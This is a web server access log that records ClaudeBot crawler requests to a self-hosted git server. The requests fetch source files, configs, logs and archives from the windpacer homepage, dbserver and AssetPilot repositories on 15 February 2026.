"/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 216.73.216.188] [Length 1014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11845] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11287] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10930] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 216.73.216.188] [Length 9859] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=rendered" [Client 216.73.216.188] [Length 10994] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 216.73.216.188] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11869] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.zip" [Client 216.73.216.188] [Length 324249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/bf87175f515287fd25d175843915ffa6178025eb.bundle" [Client 216.73.216.188] [Length 240751] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13161] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 216.73.216.188] [Length 9866] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 16625] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json?display=source" [Client 216.73.216.188] [Length 11072] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12444] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 17142] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 17167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 216.73.216.188] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9850] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/vite.config.ts" [Client 216.73.216.188] [Length 814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 11079] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/vite.config.ts" [Client 216.73.216.188] [Length 9774] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11595] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 216.73.216.188] [Length 9844] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 98386] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 216.73.216.188] [Length 10933] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10839] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf?display=source" [Client 216.73.216.188] [Length 12955] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9844] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?files=html" [Client 216.73.216.188] [Length 15602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 11792] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 216.73.216.188] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument" [Client 216.73.216.188] [Length 60410] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11879] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log?display=source" [Client 216.73.216.188] [Length 15943] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=source" [Client 216.73.216.188] [Length 11758] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 10046] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12472] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 